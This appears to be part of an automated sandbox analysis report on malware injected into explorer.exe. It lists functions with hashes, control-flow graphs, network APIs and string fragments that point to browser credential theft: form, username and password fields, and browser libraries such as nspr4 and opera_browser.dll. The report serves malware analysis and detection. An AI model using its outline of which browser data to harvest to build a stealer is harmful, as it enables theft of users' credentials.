                                                                            • Instruction ID: c5545dc0fd1692ee01300dfef0674f5f38b93dc736b7bdd1a96da5cc4a7cabc8
                                                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                            • Instruction Fuzzy Hash: D2011E70618B188FCB94EF5CE088B55B7E0FB59314F1545AED90DCB266C674DD818BC2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E63B732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 298 e63b732-e63b768 299 e63b76a-e63b782 call e63e942 298->299 300 e63b788-e63b7ab connect 298->300 299->300
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: connect
                                                                            • String ID: conn$ect
                                                                            • API String ID: 1959786783-716201944
                                                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                            • Instruction ID: f2ba1d91b86bf388631e8589a5d7eaf65c908df70ffa8f59f2ceb74c831dd8db
                                                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                            • Instruction Fuzzy Hash: 2C012C70618A1C8FCB84EF5CE088B55BBE0FB59314F1545AEA80DCB266CA74CD818BC2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E63B6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 411 e63b6b2-e63b6e5 412 e63b6e7-e63b6ff call e63e942 411->412 413 e63b705-e63b72d send 411->413 412->413
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: send
                                                                            • String ID: send
                                                                            • API String ID: 2809346765-2809346765
                                                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                            • Instruction ID: 2c2ad9a23d02c82c8ded048743244551058762005bba15468e0f1c47142cc6b3
                                                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                            • Instruction Fuzzy Hash: E7011270518A188FDBC4EF1CE088B2577E0EB58314F1545AED85DCB266C670DC818B85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E63B5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 416 e63b5b2-e63b5ea 417 e63b60a-e63b62b socket 416->417 418 e63b5ec-e63b604 call e63e942 416->418 418->417
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: socket
                                                                            • String ID: sock
                                                                            • API String ID: 98920635-2415254727
                                                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                            • Instruction ID: 7f0adc3a766df87d228c443c104e4b1f2dcd441b5e973e1acb9431941171e046
                                                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                            • Instruction Fuzzy Hash: 80012C70618A188FCB84EF1CE048B54BBE0FB59314F1545AEE85ECB266C7B0C9858B86
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E6332DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 421 e6332dd-e633320 call e63e942 424 e633326 421->424 425 e6333fa-e63340e 421->425 426 e633328-e633339 SleepEx 424->426 426->426 427 e63333b-e633341 426->427 428 e633343-e633349 427->428 429 e63334b-e633352 427->429 428->429 432 e63335c-e63336a call e63df12 428->432 430 e633370-e633376 429->430 431 e633354-e63335a 429->431 434 e6333b7-e6333bd 430->434 435 e633378-e63337e 430->435 431->430 431->432 432->430 438 e6333d4-e6333db 434->438 439 e6333bf-e6333cf call e633e72 434->439 435->434 437 e633380-e63338a 435->437 437->434 440 e63338c-e6333b1 call e634432 437->440 438->426 442 e6333e1-e6333f5 call e6330f2 438->442 439->438 440->434 442->426
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                            • Instruction ID: ce67452a197780695d5c2caedc71b86f32d107fa2c9741a6d528c86ab4e78346
                                                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                            • Instruction Fuzzy Hash: C0317A74654B49DAEB64AF39A0882A5F3A1FB65300F64866EC92DCB306CB349854CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E633412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 457 e633412-e633446 call e63e942 460 e633473-e63347d 457->460 461 e633448-e633472 call e640c9e CreateThread 457->461
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                            • Instruction ID: 89ff458a8a050d37df5d64fcf2a8eb27ba9f71596ea2205c5336bf92cd2eb5ab
                                                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                            • Instruction Fuzzy Hash: B5F0F630268B484FD788EF2CE44563AF3D0FBE9214F440A3EA55DC7364DA39C9814756
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 0F277D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                            • API String ID: 0-393284711
                                                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                            • Instruction ID: bee3779c0451cf85510fabea56e18ed1b6248b885e093cb94c9108bc28790f7f
                                                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                            • Instruction Fuzzy Hash: F1E14970528F488FC764EF68C4947AAB7E0FB58300F904A2E959FC7286DF34A546CB85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27A792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                            • API String ID: 0-2916316912
                                                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                            • Instruction ID: 9eced284cce8cb0e53ff228877b063f68acac5c67f6d5dc8ddaf9e8e2e7c9b35
                                                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                            • Instruction Fuzzy Hash: 28B18C30528B488EDB55EF68C485AEEB7F1FFA8300F50451ED49AC72A2EF749445CB86
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F278622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                            • API String ID: 0-1539916866
                                                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                            • Instruction ID: d81ea336fbe4ac2c54b983de94b1d445eac00be809b4a44ca4d8bc7320c525a3
                                                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                            • Instruction Fuzzy Hash: 9741B170A28B088FDB14DF98A44A6BD7BE2FB48700F40025ED409D3246DFB5AD45CBD6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27FAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                            • API String ID: 0-355182820
                                                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                            • Instruction ID: 91fd6c61aae099ad2f2889e518910f095d70121879564641706de7fa2cc4ac43
                                                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                            • Instruction Fuzzy Hash: 2BC14B70228B098FC758EF64C4956EAF3E1FB98304F40462E949EC7652DF34A516CBC6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27FF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                            • API String ID: 0-97273177
                                                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                            • Instruction ID: d0fc3b3195f6fb3c485e9ed64690e975b5d57c2230159989090aa0c662e95910
                                                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                            • Instruction Fuzzy Hash: A351D73112D7488FD719EF54C4816EAB7E5FB85700F501A2EE8CBC7296DBB4950ACB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F2792F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                            • API String ID: 0-639201278
                                                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                            • Instruction ID: 45899ef1d1e0922b2324397c014f76be0795457d300047f50d20118c9805faed
                                                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                            • Instruction Fuzzy Hash: 18C19070628B198FC758FF68D495AEAF3E1FB98300F954329840EC7692DF34A946C785
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F2792F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                            • API String ID: 0-639201278
                                                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                            • Instruction ID: 9869e248738a1f44caa2256b3e85afbafbc947f62633288b1294fe9d890706fd
                                                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                            • Instruction Fuzzy Hash: D7C18F70628B198FC758FF68D495AAAF3E1FB98300F954369840EC7292DF34A946C785
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27ACD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                            • API String ID: 0-2058692283
                                                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                            • Instruction ID: bb2643a635f0210b5307445b1692b507c5b62d68b0584ee78ed86e17c2700b70
                                                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                            • Instruction Fuzzy Hash: 46A1B0706287488FDB19EFA894447EEB7E1FB94310F40462ED48AD7292EF349546CB85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27ACE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                            • API String ID: 0-2058692283
                                                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                            • Instruction ID: e3db1a33873dbd07449ed7937d2521c8d28e863c3fb1ddd4053b5b4001313f20
                                                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                            • Instruction Fuzzy Hash: 079160706287488FDB19EFA8D4447EEB7E1FB98300F40462ED44AD7292EF749546CB85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27A352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $.$e$n$v
                                                                            • API String ID: 0-1849617553
                                                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                            • Instruction ID: 136ef0c7ea6d053ade1a8fbf153a34719e45e90d1fbe4899087f7c6dcda74a49
                                                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                            • Instruction Fuzzy Hash: 3D7151316287498FD759EFA8C4847AAB7F1FF58304F00062FD44AC7262EF75A9468B85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F275C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                                                            • API String ID: 0-1970020201
                                                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                            • Instruction ID: ec068f619a83ecca9ec4a38c532e4264cef551b166ed4d39d3ed7625f6bc8693
                                                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                            • Instruction Fuzzy Hash: 72515AB0928B4C8FDB64EFA4C045AEEB7F1FF58300F40462E949AE7255EF3095558B89
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27686F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4$\$dll$ion.$vers
                                                                            • API String ID: 0-1610437797
                                                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                            • Instruction ID: e560bdb3d23c7dfc8288a06a54065bd23063d1304318b49a11f5db8699465deb
                                                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                            • Instruction Fuzzy Hash: AF416030629B898FCB79EF6498457EAB7E4FB99301F40462E988EC7241EF34D5458782
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F2784B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 32.d$cli.$dll$sspi$user
                                                                            • API String ID: 0-327345718
                                                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                            • Instruction ID: 5454939efc471ec811cad81f0da05475e95cd9b6630c0ae528cc85805d4be234
                                                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                            • Instruction Fuzzy Hash: D5415F70A28F0D8FCB58EF68C0997EE77E1FB58300F51456AA80ED7251DE74D5418B86
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F276432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .dll$el32$h$kern
                                                                            • API String ID: 0-4264704552
                                                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                            • Instruction ID: 037fc3461e58201097a3274ff41334813fcfd3ea714a7dfe69958160fd6ef568
                                                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                            • Instruction Fuzzy Hash: 1A41B070618F498FD768DF29C0843AABBE1FB98300F544A2E949EC326ADF70D445CB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27D0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $Snif$f fr$om:
                                                                            • API String ID: 0-3434893486
                                                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                            • Instruction ID: 5976d0a2db9867230ce2f4e05999dfe02fc2e216fd312caecf673c1f6c2ad735
                                                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                            • Instruction Fuzzy Hash: 8E31073151DB889FD71AEB28C4847DAB7D0FB94300F50491EE49BC7692EE34A54ACB43
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27D0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $Snif$f fr$om:
                                                                            • API String ID: 0-3434893486
                                                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                            • Instruction ID: cfb99f3dca4fffc776e33b365dbe37c8701a4a332d67083c789d3a719864802b
                                                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                            • Instruction Fuzzy Hash: 9331F67152DB489FD719EB24C4846EAB7D4FB94300F90491EE49BC3696EE34E50ACB43
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F278FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .dll$chro$hild$me_c
                                                                            • API String ID: 0-3136806129
                                                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                            • Instruction ID: 2e68d7f0f9477ae5aabcab0efad10479036c0f5622f5ffa8c8b3b16db2392efe
                                                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                            • Instruction Fuzzy Hash: 4C318D30129B488FC784FF28C494BAAB7E1FF98300F84462D944ECB296DF34D5458792
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F278FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .dll$chro$hild$me_c
                                                                            • API String ID: 0-3136806129
                                                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                            • Instruction ID: e3d834ae61d590018d86ae9b5412049384b43d736e1d45ddeaf1671f958ef637
                                                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                            • Instruction Fuzzy Hash: 28319E30129B488FC784EF68C494BAAB7E1FF98300F95462D944ECB296DF34D546C792
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27B8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                            • API String ID: 0-319646191
                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                            • Instruction ID: 302a157733795991dfaea3593785bc3c9d1bd4c812ff88348353a487581b7dd5
                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                            • Instruction Fuzzy Hash: 8531D131624B0C8FCB04EFA8C8847EEB7E1FB68304F40422AD45ED7281DE788645C789
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27B8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                            • API String ID: 0-319646191
                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                            • Instruction ID: 807cd833a3c301545a117558e8719dc71e0d5ca0d19d711499dc401bbae5c3e1
                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
